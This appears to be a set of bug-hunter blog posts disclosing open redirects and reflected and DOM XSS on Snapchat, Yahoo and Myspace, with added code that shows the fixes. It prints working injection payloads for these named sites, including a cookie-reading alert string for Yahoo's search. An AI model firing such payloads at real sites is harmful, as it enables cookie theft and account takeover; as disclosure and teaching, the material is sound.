Add nullbyte to URL

Tested this in the latest version of Chrome:

http://zulln.se/test
You get a 404

http://zulln.se/test%00
You search for the URL on Google

Update: this only happens when you type the URL yourself; if you click on the link something else will happen.

Try it out here: http://jsbin.com/oZudEDEz/2/

Open Redirect at getpocket.com

The unusual thing in this case is that they DON'T use the Location header but some JavaScript instead.

XSS and Open Redirect at Snapchat

Credit to @revskills for publishing this.

When you first go to the link the server sends a Location header to the URL in the GET variable named "next" (open redirect).
The second time this does not happen; I guess it's a cookie-based control.

[Burp screenshot]

The GET variable "next" is also printed in plain multiple times.

https://support.snapchat.com/login?next="><script>alert(1)</script>

Now check line 63 and you will find this: <input type="hidden" name="next" value=""><script>alert(1)</script>">

Then we have this thing:

<script type="text/javascript">
skipLogin=('&skip_login=true')
document.write(
'<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="[payload]' + skipLogin + '">Skip Sign In</a></div>'
)
</script>

We can insert anything except ; there.
The easiest payload is this:

Payload: "><script>alert(1)</script>
Request: https://support.snapchat.com/login?next="><script>alert(1)</script>

<script type="text/javascript">
skipLogin=('&skip_login=true')
document.write(
'<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="><script>alert(1)</script>' + skipLogin + '">Skip Sign In</a></div>'
)
</script>

What really happens here is that the script writes it out and then executes it, so really it is kind of a DOM-XSS (even if a normal XSS is probably possible if you try).

So basically it is a DOM-XSS, an open redirect and a reflected XSS on the very same page.

XSS at Yahoo

This post was moved from another blog and therefore the date is wrong.

A few days ago Yahoo posted a blog post saying that they will start a bug bounty program. Since it was new and so on, I thought it could be fun to check if I was able to find anything.

I had about an hour to spare, and analyzing a site of Yahoo's size in that time is kinda impossible, so I was only able to look for the easy ones for now.
No DOM-based and so on; we save that for another time.

I started by searching for different input forms at Yahoo using Google and keywords like "search". After testing a few different ones with no result I found this:

Search-term: test"jukk
----------

function () {
var keyword = "test\"jukk";
var adNum = 0;
var requestStartTime = 0;
var requestEndTime = 0;
var runCSA = function () {

Okay, they are escaping my double quote.
Let's try to escape the escape?

Search-term: test\"jukk
----------

function () {
var keyword = "test\\"jukk";
var adNum = 0;
var requestStartTime = 0;
var requestEndTime = 0;
var runCSA = function () {

As you can see, we escaped the escape so it won't escape.

Now, let's try to alert our cookies.

Search-term: \";alert(document.cookie)//
----------

function () {
var keyword = "\\";alert(document.cookie)//";
var adNum = 0;
var requestStartTime = 0;
var requestEndTime = 0;
var runCSA = function () {

It works!
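The escape-the-escape trick above is what happens when only the double quote is escaped before the search term is reflected into a JavaScript string literal. The following is an added example, not Yahoo's code, showing the broken escaper beside the fix and a small re-parser that tells whether a given term breaks out of the literal; function names are my own.

```javascript
// Added example, not Yahoo's code: why escaping only the double quote is
// not enough when a search term is reflected into a JavaScript string
// literal, and what the fix looks like. Payloads are the ones from the post.

// The broken approach: only " gets a backslash, so a user-supplied backslash
// escapes the escape and the literal closes early (as seen on Yahoo).
function naiveEmbed(term) {
  return 'var keyword = "' + term.replace(/"/g, '\\"') + '";';
}

// The fix: JSON.stringify escapes backslashes, quotes and control
// characters; "</" is escaped as well so the literal can never contain
// "</script>" and terminate the enclosing script block.
function safeEmbed(term) {
  return 'var keyword = ' + JSON.stringify(term).replace(/<\//g, '<\\/') + ';';
}

// Re-parse the generated statement the way a JS engine reads a string
// literal: from the first " to the first unescaped ", where a backslash
// makes the following character literal. Returns the decoded value and
// whatever text follows the closing quote. (Simplified: \n, \uXXXX etc.
// are not decoded, which is enough for the payloads in the post.)
function parseKeywordStatement(js) {
  var i = js.indexOf('"') + 1;
  var value = '';
  while (i < js.length && js.charAt(i) !== '"') {
    if (js.charAt(i) === '\\') i++;
    value += js.charAt(i);
    i++;
  }
  return { value: value, trailing: js.slice(i + 1) };
}

// True when the term did not survive as the literal's value, or when
// anything other than the closing ";" follows the literal: in both cases
// the input escaped the string context.
function breaksOut(embed, term) {
  var parsed = parseKeywordStatement(embed(term));
  return parsed.value !== term || parsed.trailing !== ';';
}
```

Running `breaksOut(naiveEmbed, '\\";alert(document.cookie)//')` reproduces the breakout from the post, while the same term through `safeEmbed` stays inside the literal.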

Get “generated source”

This post was moved from another blog and therefore the date is wrong.

Here is a very simple bookmarklet I wrote to get the "generated source" of a site.

My plan for this in the future is to add syntax highlighting and a "beautifier" to make the code readable. Feel free to make whatever you want from it.

javascript:(function () {
  // Open a blank window to show the source in
  var win = window.open();
  // Serialize the live DOM, i.e. the markup as it is after scripts have run
  var source = document.documentElement.outerHTML;
  // Escape & and < so the markup is shown as text instead of being rendered
  source = source.replace(/&/g, '&amp;').replace(/</g, '&lt;');
  win.document.write('<pre>' + source + '</pre>');
  win.document.close();
})();

XSS at Myspace

This post was moved from another blog and therefore the date is wrong.

Going to Myspace I saw their new fancy search function; of course I had to try to do something with it.
Start by typing test"jukk (where jukk is just something random that never exists in the code from the start); using a simple bookmarklet it is easy as pie to see all the code generated through JavaScript.

<h3>
    <a href="/search/songs?q=test" jukk"="">
        <span>See more <i></i></span>
        <span>SONGS</span>
    </a>
</h3>

So they don't escape the quote but insert a space after it (rare…).
An a href tag is not that fun actually, so let's see if we can use > to escape that too.

<h3>
    <a href="/search/songs?q=test">jukk"&gt;
        <span>See more <i></i></span>
        <span>SONGS</span>
    </a>
</h3>

That was possible too; now let's just see if we can use < to open a new tag.
Using the same string again.

<h3>
    <a href="/search/songs?q=test" <jukk"="">
        <span>See more <i></i></span>
        <span>SONGS</span>
    </a>
</h3>

Awesome!
Now it seems very easy to get a little fancy alert box staring at us.
Let's try with "><script>alert(1)</script> and check if that works.

<h3>
    <a href="/search/videos?q="><script>alert(1)</script>"&gt;
        <span>See more <i></i></span>
        <span>VIDEOS</span>
    </a>
</h3>

[screenshot: the alert box]
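The Myspace case above and the Snapchat and Pocket posts earlier all come down to user input landing in an href attribute (and, for "next", in a redirect) without validation or encoding. The following is an added example, not code from the original posts or from Snapchat, Pocket or Myspace, showing how the same two links can be built safely; function names are my own.

```javascript
// Added example, not code from the original posts or from Snapchat, Pocket
// or Myspace; function names are my own. It shows how a parameter that
// lands in an href attribute (Snapchat "next", Myspace "q") and, for
// "next", in a redirect, can be validated and encoded instead of pasted raw.

// A redirect target is accepted only as a same-site relative path: exactly
// one leading "/" (rejects "//evil.example", "/\evil.example" and anything
// with a scheme) and no whitespace or control characters.
function isSafeNext(next) {
  if (typeof next !== 'string' || next.length === 0 || next.length > 2048) return false;
  if (next.charAt(0) !== '/') return false;
  if (next.charAt(1) === '/' || next.charAt(1) === '\\') return false;
  if (/[\s\x00-\x1f\x7f]/.test(next)) return false;
  return true;
}

// Where to send the user: the validated path, otherwise the site root.
function redirectTarget(next) {
  return isSafeNext(next) ? next : '/';
}

// Encoding for a double-quoted HTML attribute: each character that can
// close the attribute or open a tag becomes an entity.
function encodeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// The "Skip Sign In" link from the Snapchat page: "next" is validated,
// URL-encoded for the query string and attribute-encoded for the href.
function skipSignInHtml(next) {
  var href = '/login?next=' + encodeURIComponent(redirectTarget(next)) + '&skip_login=true';
  return '<div class="login-p"><a class="skip-sign-in dark-gray-text" href="' +
    encodeAttr(href) + '">Skip Sign In</a></div>';
}

// The "See more" link from the Myspace search page: the term is URL-encoded
// for the query string and the whole href attribute-encoded.
function searchLinkHtml(kind, q) {
  var href = '/search/' + kind + '?q=' + encodeURIComponent(q);
  return '<h3><a href="' + encodeAttr(href) + '"><span>See more</span><span>' +
    encodeAttr(kind.toUpperCase()) + '</span></a></h3>';
}
```

Feeding the post's "><script>alert(1)</script> payload into either builder yields a link whose href contains no tag at all, and an external "next" falls back to the site root instead of redirecting.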